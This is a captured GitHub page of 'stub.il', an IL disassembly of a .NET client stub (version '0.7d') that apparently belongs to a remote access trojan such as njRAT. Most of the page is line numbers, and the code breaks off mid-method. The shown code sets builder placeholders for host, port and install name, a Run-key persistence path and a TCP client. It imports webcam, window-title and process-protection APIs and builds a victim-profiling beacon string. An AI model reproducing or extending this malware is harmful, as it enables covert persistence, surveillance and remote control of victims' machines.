This repository has been archived by the owner on Feb 6, 2019. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 39
/
stub.il
4975 lines (4638 loc) · 228 KB
/
stub.il
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
// Microsoft (R) .NET Framework IL Disassembler. Version 3.5.30729.1
// Copyright (c) Microsoft Corporation. All rights reserved.
// Metadata version: v2.0.50727
.module extern avicap32.dll
.module extern kernel32
.module extern user32.dll
.module extern user32
.module extern ntdll
.assembly extern mscorlib
{
.publickeytoken = (B7 7A 5C 56 19 34 E0 89 ) // .z\V.4..
.ver 2:0:0:0
}
.assembly extern Microsoft.VisualBasic
{
.publickeytoken = (B0 3F 5F 7F 11 D5 0A 3A ) // .?_....:
.ver 8:0:0:0
}
.assembly extern System.Windows.Forms
{
.publickeytoken = (B7 7A 5C 56 19 34 E0 89 ) // .z\V.4..
.ver 2:0:0:0
}
.assembly extern System
{
.publickeytoken = (B7 7A 5C 56 19 34 E0 89 ) // .z\V.4..
.ver 2:0:0:0
}
.assembly extern System.Drawing
{
.publickeytoken = (B0 3F 5F 7F 11 D5 0A 3A ) // .?_....:
.ver 2:0:0:0
}
.assembly j
{
.custom instance void [mscorlib]System.Runtime.CompilerServices.CompilationRelaxationsAttribute::.ctor(int32) = ( 01 00 08 00 00 00 00 00 )
.custom instance void [mscorlib]System.Runtime.CompilerServices.RuntimeCompatibilityAttribute::.ctor() = ( 01 00 01 00 54 02 16 57 72 61 70 4E 6F 6E 45 78 // ....T..WrapNonEx
63 65 70 74 69 6F 6E 54 68 72 6F 77 73 01 ) // ceptionThrows.
.hash algorithm 0x00008004
.ver 0:0:0:0
}
.module j.exe
// MVID: {5991B206-D4A6-4D0C-AFFB-28DF5FE769AB}
.imagebase 0x00400000
.file alignment 0x00000200
.stackreserve 0x00100000
.subsystem 0x0002 // WINDOWS_GUI
.corflags 0x00000003 // ILONLY 32BITREQUIRED
// Image base: 0x00470000
.class private auto ansi sealed beforefieldinit j.OK
extends [mscorlib]System.Object
{
.custom instance void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.StandardModuleAttribute::.ctor() = ( 01 00 00 00 )
.field public static string VN
.field public static string VR
.field public static object MT
.field public static string EXE
.field public static string DR
.field public static string RG
.field public static string H
.field public static string P
.field public static string Y
.field public static bool BD
.field public static bool Idr
.field public static bool IsF
.field public static bool Isu
.field public static class [mscorlib]System.IO.FileInfo LO
.field public static class [mscorlib]System.IO.FileStream FS
.field public static class [Microsoft.VisualBasic]Microsoft.VisualBasic.Devices.Computer F
.field public static class j.kl kq
.field public static bool Cn
.field public static string sf
.field public static class [System]System.Net.Sockets.TcpClient C
.field private static class [mscorlib]System.IO.MemoryStream MeM
.field private static uint8[] b
.field private static string lastcap
.field public static object PLG
.method private specialname rtspecialname static
void .cctor() cil managed
{
// Code size 246 (0xf6)
.maxstack 1
IL_0000: ldstr "[VN]"
IL_0005: stsfld string j.OK::VN
IL_000a: ldstr "0.7d"
IL_000f: stsfld string j.OK::VR
IL_0014: ldnull
IL_0015: stsfld object j.OK::MT
IL_001a: ldstr "[EXE]"
IL_001f: stsfld string j.OK::EXE
IL_0024: ldstr "[DR]"
IL_0029: stsfld string j.OK::DR
IL_002e: ldstr "[RG]"
IL_0033: stsfld string j.OK::RG
IL_0038: ldstr "[H]"
IL_003d: stsfld string j.OK::H
IL_0042: ldstr "[P]"
IL_0047: stsfld string j.OK::P
IL_004c: ldstr "|'|'|"
IL_0051: stsfld string j.OK::Y
IL_0056: ldstr "[BD]"
IL_005b: call bool [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(string)
IL_0060: stsfld bool j.OK::BD
IL_0065: ldstr "[Idr]"
IL_006a: call bool [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(string)
IL_006f: stsfld bool j.OK::Idr
IL_0074: ldstr "[Isf]"
IL_0079: call bool [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(string)
IL_007e: stsfld bool j.OK::IsF
IL_0083: ldstr "[Isu]"
IL_0088: call bool [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(string)
IL_008d: stsfld bool j.OK::Isu
IL_0092: call class [mscorlib]System.Reflection.Assembly [mscorlib]System.Reflection.Assembly::GetEntryAssembly()
IL_0097: callvirt instance string [mscorlib]System.Reflection.Assembly::get_Location()
IL_009c: newobj instance void [mscorlib]System.IO.FileInfo::.ctor(string)
IL_00a1: stsfld class [mscorlib]System.IO.FileInfo j.OK::LO
IL_00a6: newobj instance void [Microsoft.VisualBasic]Microsoft.VisualBasic.Devices.Computer::.ctor()
IL_00ab: stsfld class [Microsoft.VisualBasic]Microsoft.VisualBasic.Devices.Computer j.OK::F
IL_00b0: ldnull
IL_00b1: stsfld class j.kl j.OK::kq
IL_00b6: ldc.i4.0
IL_00b7: stsfld bool j.OK::Cn
IL_00bc: ldstr "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
IL_00c1: stsfld string j.OK::sf
IL_00c6: ldnull
IL_00c7: stsfld class [System]System.Net.Sockets.TcpClient j.OK::C
IL_00cc: newobj instance void [mscorlib]System.IO.MemoryStream::.ctor()
IL_00d1: stsfld class [mscorlib]System.IO.MemoryStream j.OK::MeM
IL_00d6: ldc.i4 0x1401
IL_00db: newarr [mscorlib]System.Byte
IL_00e0: stsfld uint8[] j.OK::b
IL_00e5: ldstr ""
IL_00ea: stsfld string j.OK::lastcap
IL_00ef: ldnull
IL_00f0: stsfld object j.OK::PLG
IL_00f5: ret
} // end of method OK::.cctor
.method private static pinvokeimpl("ntdll" winapi)
int32 NtSetInformationProcess(native int hProcess,
int32 processInformationClass,
int32& processInformation,
int32 processInformationLength) cil managed preservesig
{
}
.method public static pinvokeimpl("avicap32.dll" nomangle ansi lasterr winapi)
bool capGetDriverDescriptionA(int16 wDriver,
string& marshal( byvalstr) lpszName,
int32 cbName,
string& marshal( byvalstr) lpszVer,
int32 cbVer) cil managed preservesig
{
}
.method private static pinvokeimpl("kernel32" as "GetVolumeInformationA" nomangle ansi lasterr winapi)
int32 GetVolumeInformation(string& marshal( byvalstr) lpRootPathName,
string& marshal( byvalstr) lpVolumeNameBuffer,
int32 nVolumeNameSize,
int32& lpVolumeSerialNumber,
int32& lpMaximumComponentLength,
int32& lpFileSystemFlags,
string& marshal( byvalstr) lpFileSystemNameBuffer,
int32 nFileSystemNameSize) cil managed preservesig
{
}
.method public static pinvokeimpl("user32.dll" nomangle ansi lasterr winapi)
native int GetForegroundWindow() cil managed preservesig
{
}
.method public static pinvokeimpl("user32.dll" as "GetWindowTextA" nomangle ansi lasterr winapi)
int32 GetWindowText(native int hWnd,
string& marshal( byvalstr) WinTitle,
int32 MaxLength) cil managed preservesig
{
}
.method public static pinvokeimpl("user32.dll" as "GetWindowTextLengthA" nomangle ansi lasterr winapi)
int32 GetWindowTextLength(int64 hwnd) cil managed preservesig
{
}
.method public static void DLV(string n) cil managed
{
// Code size 59 (0x3b)
.maxstack 3
.locals init (class [mscorlib]System.Exception V_0)
.try
{
IL_0000: ldsfld class [Microsoft.VisualBasic]Microsoft.VisualBasic.Devices.Computer j.OK::F
IL_0005: callvirt instance class [Microsoft.VisualBasic]Microsoft.VisualBasic.MyServices.RegistryProxy [Microsoft.VisualBasic]Microsoft.VisualBasic.Devices.ServerComputer::get_Registry()
IL_000a: callvirt instance class [mscorlib]Microsoft.Win32.RegistryKey [Microsoft.VisualBasic]Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser()
IL_000f: ldstr "Software\\"
IL_0014: ldsfld string j.OK::RG
IL_0019: call string [mscorlib]System.String::Concat(string,
string)
IL_001e: ldc.i4.1
IL_001f: callvirt instance class [mscorlib]Microsoft.Win32.RegistryKey [mscorlib]Microsoft.Win32.RegistryKey::OpenSubKey(string,
bool)
IL_0024: ldarg.0
IL_0025: callvirt instance void [mscorlib]Microsoft.Win32.RegistryKey::DeleteValue(string)
IL_002a: leave.s IL_003a
} // end .try
catch [mscorlib]System.Exception
{
IL_002c: dup
IL_002d: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(class [mscorlib]System.Exception)
IL_0032: stloc.0
IL_0033: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError()
IL_0038: leave.s IL_003a
} // end handler
IL_003a: ret
} // end of method OK::DLV
.method public static object GTV(string n,
object 'ret') cil managed
{
// Code size 68 (0x44)
.maxstack 3
.locals init (object V_0,
class [mscorlib]System.Exception V_1)
.try
{
IL_0000: ldsfld class [Microsoft.VisualBasic]Microsoft.VisualBasic.Devices.Computer j.OK::F
IL_0005: callvirt instance class [Microsoft.VisualBasic]Microsoft.VisualBasic.MyServices.RegistryProxy [Microsoft.VisualBasic]Microsoft.VisualBasic.Devices.ServerComputer::get_Registry()
IL_000a: callvirt instance class [mscorlib]Microsoft.Win32.RegistryKey [Microsoft.VisualBasic]Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser()
IL_000f: ldstr "Software\\"
IL_0014: ldsfld string j.OK::RG
IL_0019: call string [mscorlib]System.String::Concat(string,
string)
IL_001e: callvirt instance class [mscorlib]Microsoft.Win32.RegistryKey [mscorlib]Microsoft.Win32.RegistryKey::OpenSubKey(string)
IL_0023: ldarg.0
IL_0024: ldarg.1
IL_0025: call object [mscorlib]System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(object)
IL_002a: callvirt instance object [mscorlib]Microsoft.Win32.RegistryKey::GetValue(string,
object)
IL_002f: stloc.0
IL_0030: leave.s IL_0042
} // end .try
catch [mscorlib]System.Exception
{
IL_0032: dup
IL_0033: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(class [mscorlib]System.Exception)
IL_0038: stloc.1
IL_0039: ldarg.1
IL_003a: stloc.0
IL_003b: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError()
IL_0040: leave.s IL_0042
} // end handler
IL_0042: ldloc.0
IL_0043: ret
} // end of method OK::GTV
.method public static bool STV(string n,
object t,
valuetype [mscorlib]Microsoft.Win32.RegistryValueKind typ) cil managed
{
// Code size 70 (0x46)
.maxstack 4
.locals init (bool V_0,
class [mscorlib]System.Exception V_1)
.try
{
IL_0000: ldsfld class [Microsoft.VisualBasic]Microsoft.VisualBasic.Devices.Computer j.OK::F
IL_0005: callvirt instance class [Microsoft.VisualBasic]Microsoft.VisualBasic.MyServices.RegistryProxy [Microsoft.VisualBasic]Microsoft.VisualBasic.Devices.ServerComputer::get_Registry()
IL_000a: callvirt instance class [mscorlib]Microsoft.Win32.RegistryKey [Microsoft.VisualBasic]Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser()
IL_000f: ldstr "Software\\"
IL_0014: ldsfld string j.OK::RG
IL_0019: call string [mscorlib]System.String::Concat(string,
string)
IL_001e: callvirt instance class [mscorlib]Microsoft.Win32.RegistryKey [mscorlib]Microsoft.Win32.RegistryKey::CreateSubKey(string)
IL_0023: ldarg.0
IL_0024: ldarg.1
IL_0025: call object [mscorlib]System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(object)
IL_002a: ldarg.2
IL_002b: callvirt instance void [mscorlib]Microsoft.Win32.RegistryKey::SetValue(string,
object,
valuetype [mscorlib]Microsoft.Win32.RegistryValueKind)
IL_0030: ldc.i4.1
IL_0031: stloc.0
IL_0032: leave.s IL_0044
} // end .try
catch [mscorlib]System.Exception
{
IL_0034: dup
IL_0035: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(class [mscorlib]System.Exception)
IL_003a: stloc.1
IL_003b: ldc.i4.0
IL_003c: stloc.0
IL_003d: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError()
IL_0042: leave.s IL_0044
} // end handler
IL_0044: ldloc.0
IL_0045: ret
} // end of method OK::STV
.method public static string inf() cil managed
{
// Code size 941 (0x3ad)
.maxstack 4
.locals init (string V_0,
string V_1,
string V_2,
class [mscorlib]System.Exception V_3,
class [mscorlib]System.Exception V_4,
class [mscorlib]System.Exception V_5,
class [mscorlib]System.Exception V_6,
class [mscorlib]System.Exception V_7,
string[] V_8,
class [mscorlib]System.Exception V_9,
class [mscorlib]System.Exception V_10,
string V_11,
class [mscorlib]System.Exception V_12,
string V_13,
string V_14,
valuetype [mscorlib]System.DateTime V_15,
valuetype [mscorlib]System.DateTime V_16,
int32 V_17,
string[] V_18)
IL_0000: ldstr "ll"
IL_0005: ldsfld string j.OK::Y
IL_000a: call string [mscorlib]System.String::Concat(string,
string)
IL_000f: stloc.1
.try
{
IL_0010: ldstr "vn"
IL_0015: ldstr ""
IL_001a: call object j.OK::GTV(string,
object)
IL_001f: ldstr ""
IL_0024: ldc.i4.0
IL_0025: call bool [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.Operators::ConditionalCompareObjectEqual(object,
object,
bool)
IL_002a: brfalse.s IL_005c
IL_002c: ldloc.1
IL_002d: ldsflda string j.OK::VN
IL_0032: call string j.OK::DEB(string&)
IL_0037: ldstr "_"
IL_003c: call string j.OK::HWD()
IL_0041: call string [mscorlib]System.String::Concat(string,
string,
string)
IL_0046: stloc.s V_13
IL_0048: ldloca.s V_13
IL_004a: call string j.OK::ENB(string&)
IL_004f: ldsfld string j.OK::Y
IL_0054: call string [mscorlib]System.String::Concat(string,
string,
string)
IL_0059: stloc.1
IL_005a: leave.s IL_00c7
IL_005c: ldloc.1
IL_005d: ldstr "vn"
IL_0062: ldstr ""
IL_0067: call object j.OK::GTV(string,
object)
IL_006c: call string [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.Conversions::ToString(object)
IL_0071: stloc.s V_13
IL_0073: ldloca.s V_13
IL_0075: call string j.OK::DEB(string&)
IL_007a: ldstr "_"
IL_007f: call string j.OK::HWD()
IL_0084: call string [mscorlib]System.String::Concat(string,
string,
string)
IL_0089: stloc.s V_14
IL_008b: ldloca.s V_14
IL_008d: call string j.OK::ENB(string&)
IL_0092: ldsfld string j.OK::Y
IL_0097: call string [mscorlib]System.String::Concat(string,
string,
string)
IL_009c: stloc.1
IL_009d: leave.s IL_00c7
} // end .try
catch [mscorlib]System.Exception
{
IL_009f: dup
IL_00a0: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(class [mscorlib]System.Exception)
IL_00a5: stloc.3
IL_00a6: ldloc.1
IL_00a7: call string j.OK::HWD()
IL_00ac: stloc.s V_14
IL_00ae: ldloca.s V_14
IL_00b0: call string j.OK::ENB(string&)
IL_00b5: ldsfld string j.OK::Y
IL_00ba: call string [mscorlib]System.String::Concat(string,
string,
string)
IL_00bf: stloc.1
IL_00c0: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError()
IL_00c5: leave.s IL_00c7
} // end handler
.try
{
IL_00c7: ldloc.1
IL_00c8: call string [mscorlib]System.Environment::get_MachineName()
IL_00cd: ldsfld string j.OK::Y
IL_00d2: call string [mscorlib]System.String::Concat(string,
string,
string)
IL_00d7: stloc.1
IL_00d8: leave.s IL_00fa
} // end .try
catch [mscorlib]System.Exception
{
IL_00da: dup
IL_00db: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(class [mscorlib]System.Exception)
IL_00e0: stloc.s V_4
IL_00e2: ldloc.1
IL_00e3: ldstr "\?\?"
IL_00e8: ldsfld string j.OK::Y
IL_00ed: call string [mscorlib]System.String::Concat(string,
string,
string)
IL_00f2: stloc.1
IL_00f3: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError()
IL_00f8: leave.s IL_00fa
} // end handler
.try
{
IL_00fa: ldloc.1
IL_00fb: call string [mscorlib]System.Environment::get_UserName()
IL_0100: ldsfld string j.OK::Y
IL_0105: call string [mscorlib]System.String::Concat(string,
string,
string)
IL_010a: stloc.1
IL_010b: leave.s IL_012d
} // end .try
catch [mscorlib]System.Exception
{
IL_010d: dup
IL_010e: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(class [mscorlib]System.Exception)
IL_0113: stloc.s V_5
IL_0115: ldloc.1
IL_0116: ldstr "\?\?"
IL_011b: ldsfld string j.OK::Y
IL_0120: call string [mscorlib]System.String::Concat(string,
string,
string)
IL_0125: stloc.1
IL_0126: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError()
IL_012b: leave.s IL_012d
} // end handler
.try
{
IL_012d: ldloc.1
IL_012e: ldsfld class [mscorlib]System.IO.FileInfo j.OK::LO
IL_0133: callvirt instance valuetype [mscorlib]System.DateTime [mscorlib]System.IO.FileSystemInfo::get_LastWriteTime()
IL_0138: stloc.s V_15
IL_013a: ldloca.s V_15
IL_013c: call instance valuetype [mscorlib]System.DateTime [mscorlib]System.DateTime::get_Date()
IL_0141: stloc.s V_16
IL_0143: ldloca.s V_16
IL_0145: ldstr "yy-MM-dd"
IL_014a: call instance string [mscorlib]System.DateTime::ToString(string)
IL_014f: ldsfld string j.OK::Y
IL_0154: call string [mscorlib]System.String::Concat(string,
string,
string)
IL_0159: stloc.1
IL_015a: leave.s IL_017c
} // end .try
catch [mscorlib]System.Exception
{
IL_015c: dup
IL_015d: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(class [mscorlib]System.Exception)
IL_0162: stloc.s V_6
IL_0164: ldloc.1
IL_0165: ldstr "\?\?-\?\?-\?\?"
IL_016a: ldsfld string j.OK::Y
IL_016f: call string [mscorlib]System.String::Concat(string,
string,
string)
IL_0174: stloc.1
IL_0175: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError()
IL_017a: leave.s IL_017c
} // end handler
IL_017c: ldloc.1
IL_017d: ldstr ""
IL_0182: ldsfld string j.OK::Y
IL_0187: call string [mscorlib]System.String::Concat(string,
string,
string)
IL_018c: stloc.1
.try
{
IL_018d: ldloc.1
IL_018e: ldsfld class [Microsoft.VisualBasic]Microsoft.VisualBasic.Devices.Computer j.OK::F
IL_0193: callvirt instance class [Microsoft.VisualBasic]Microsoft.VisualBasic.Devices.ComputerInfo [Microsoft.VisualBasic]Microsoft.VisualBasic.Devices.ServerComputer::get_Info()
IL_0198: callvirt instance string [Microsoft.VisualBasic]Microsoft.VisualBasic.Devices.ComputerInfo::get_OSFullName()
IL_019d: ldstr "Microsoft"
IL_01a2: ldstr ""
IL_01a7: callvirt instance string [mscorlib]System.String::Replace(string,
string)
IL_01ac: ldstr "Windows"
IL_01b1: ldstr "Win"
IL_01b6: callvirt instance string [mscorlib]System.String::Replace(string,
string)
IL_01bb: ldstr bytearray (AE 00 )
IL_01c0: ldstr ""
IL_01c5: callvirt instance string [mscorlib]System.String::Replace(string,
string)
IL_01ca: ldstr bytearray (22 21 ) // "!
IL_01cf: ldstr ""
IL_01d4: callvirt instance string [mscorlib]System.String::Replace(string,
string)
IL_01d9: ldstr " "
IL_01de: ldstr " "
IL_01e3: callvirt instance string [mscorlib]System.String::Replace(string,
string)
IL_01e8: ldstr " Win"
IL_01ed: ldstr "Win"
IL_01f2: callvirt instance string [mscorlib]System.String::Replace(string,
string)
IL_01f7: call string [mscorlib]System.String::Concat(string,
string)
IL_01fc: stloc.1
IL_01fd: leave.s IL_021a
} // end .try
catch [mscorlib]System.Exception
{
IL_01ff: dup
IL_0200: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(class [mscorlib]System.Exception)
IL_0205: stloc.s V_7
IL_0207: ldloc.1
IL_0208: ldstr "\?\?"
IL_020d: call string [mscorlib]System.String::Concat(string,
string)
IL_0212: stloc.1
IL_0213: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError()
IL_0218: leave.s IL_021a
} // end handler
IL_021a: ldloc.1
IL_021b: ldstr "SP"
IL_0220: call string [mscorlib]System.String::Concat(string,
string)
IL_0225: stloc.1
.try
{
IL_0226: call class [mscorlib]System.OperatingSystem [mscorlib]System.Environment::get_OSVersion()
IL_022b: callvirt instance string [mscorlib]System.OperatingSystem::get_ServicePack()
IL_0230: ldstr " "
IL_0235: ldc.i4.m1
IL_0236: ldc.i4.0
IL_0237: call string[] [Microsoft.VisualBasic]Microsoft.VisualBasic.Strings::Split(string,
string,
int32,
valuetype [Microsoft.VisualBasic]Microsoft.VisualBasic.CompareMethod)
IL_023c: stloc.s V_8
IL_023e: ldloc.s V_8
IL_0240: ldlen
IL_0241: conv.ovf.i4
IL_0242: ldc.i4.1
IL_0243: bne.un.s IL_0251
IL_0245: ldloc.1
IL_0246: ldstr "0"
IL_024b: call string [mscorlib]System.String::Concat(string,
string)
IL_0250: stloc.1
IL_0251: ldloc.1
IL_0252: ldloc.s V_8
IL_0254: ldloc.s V_8
IL_0256: ldlen
IL_0257: conv.ovf.i4
IL_0258: ldc.i4.1
IL_0259: sub.ovf
IL_025a: ldelem.ref
IL_025b: call string [mscorlib]System.String::Concat(string,
string)
IL_0260: stloc.1
IL_0261: leave.s IL_027e
} // end .try
catch [mscorlib]System.Exception
{
IL_0263: dup
IL_0264: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(class [mscorlib]System.Exception)
IL_0269: stloc.s V_9
IL_026b: ldloc.1
IL_026c: ldstr "0"
IL_0271: call string [mscorlib]System.String::Concat(string,
string)
IL_0276: stloc.1
IL_0277: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError()
IL_027c: leave.s IL_027e
} // end handler
.try
{
IL_027e: ldc.i4.s 38
IL_0280: call string [mscorlib]System.Environment::GetFolderPath(valuetype [mscorlib]System.Environment/SpecialFolder)
IL_0285: ldstr "x86"
IL_028a: callvirt instance bool [mscorlib]System.String::Contains(string)
IL_028f: brfalse.s IL_02a4
IL_0291: ldloc.1
IL_0292: ldstr " x64"
IL_0297: ldsfld string j.OK::Y
IL_029c: call string [mscorlib]System.String::Concat(string,
string,
string)
IL_02a1: stloc.1
IL_02a2: leave.s IL_02d2
IL_02a4: ldloc.1
IL_02a5: ldstr " x86"
IL_02aa: ldsfld string j.OK::Y
IL_02af: call string [mscorlib]System.String::Concat(string,
string,
string)
IL_02b4: stloc.1
IL_02b5: leave.s IL_02d2
} // end .try
catch [mscorlib]System.Exception
{
IL_02b7: dup
IL_02b8: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(class [mscorlib]System.Exception)
IL_02bd: stloc.s V_10
IL_02bf: ldloc.1
IL_02c0: ldsfld string j.OK::Y
IL_02c5: call string [mscorlib]System.String::Concat(string,
string)
IL_02ca: stloc.1
IL_02cb: call void [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError()
IL_02d0: leave.s IL_02d2
} // end handler
IL_02d2: call bool j.OK::Cam()
IL_02d7: brfalse.s IL_02ec
IL_02d9: ldloc.1
IL_02da: ldstr "Yes"
IL_02df: ldsfld string j.OK::Y
IL_02e4: call string [mscorlib]System.String::Concat(string,
string,
string)
IL_02e9: stloc.1
IL_02ea: br.s IL_02fd
IL_02ec: ldloc.1
IL_02ed: ldstr "No"
IL_02f2: ldsfld string j.OK::Y
IL_02f7: call string [mscorlib]System.String::Concat(string,
string,
string)
IL_02fc: stloc.1
IL_02fd: ldloc.1
IL_02fe: ldsfld string j.OK::VR
IL_0303: ldsfld string j.OK::Y
IL_0308: call string [mscorlib]System.String::Concat(string,
string,
string)
IL_030d: stloc.1
IL_030e: ldloc.1
IL_030f: ldstr ".."
IL_0314: ldsfld string j.OK::Y
IL_0319: call string [mscorlib]System.String::Concat(string,
string,
string)
IL_031e: stloc.1
IL_031f: ldloc.1
IL_0320: call string j.OK::ACT()
IL_0325: ldsfld string j.OK::Y
IL_032a: call string [mscorlib]System.String::Concat(string,
string,
string)
IL_032f: stloc.1
IL_0330: ldstr ""
IL_0335: stloc.2
.try
{
IL_0336: ldsfld class [Microsoft.VisualBasic]Microsoft.VisualBasic.Devices.Computer j.OK::F
IL_033b: callvirt instance class [Microsoft.VisualBasic]Microsoft.VisualBasic.MyServices.RegistryProxy [Microsoft.VisualBasic]Microsoft.VisualBasic.Devices.ServerComputer::get_Registry()
IL_0340: callvirt instance class [mscorlib]Microsoft.Win32.RegistryKey [Microsoft.VisualBasic]Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser()
IL_0345: ldstr "Software\\"
IL_034a: ldsfld string j.OK::RG
IL_034f: call string [mscorlib]System.String::Concat(string,
string)
IL_0354: ldc.i4.0
IL_0355: callvirt instance class [mscorlib]Microsoft.Win32.RegistryKey [mscorlib]Microsoft.Win32.RegistryKey::CreateSubKey(string,
valuetype [mscorlib]Microsoft.Win32.RegistryKeyPermissionCheck)
IL_035a: callvirt instance string[] [mscorlib]Microsoft.Win32.RegistryKey::GetValueNames()
IL_035f: stloc.s V_18
IL_0361: ldc.i4.0
IL_0362: stloc.s V_17
IL_0364: br.s IL_038c
IL_0366: ldloc.s V_18
IL_0368: ldloc.s V_17
IL_036a: ldelem.ref
IL_036b: stloc.s V_11
IL_036d: ldloc.s V_11
IL_036f: callvirt instance int32 [mscorlib]System.String::get_Length()
IL_0374: ldc.i4.s 32
IL_0376: bne.un.s IL_0386
IL_0378: ldloc.2
IL_0379: ldloc.s V_11
IL_037b: ldstr ","
IL_0380: call string [mscorlib]System.String::Concat(string,
string,
string)
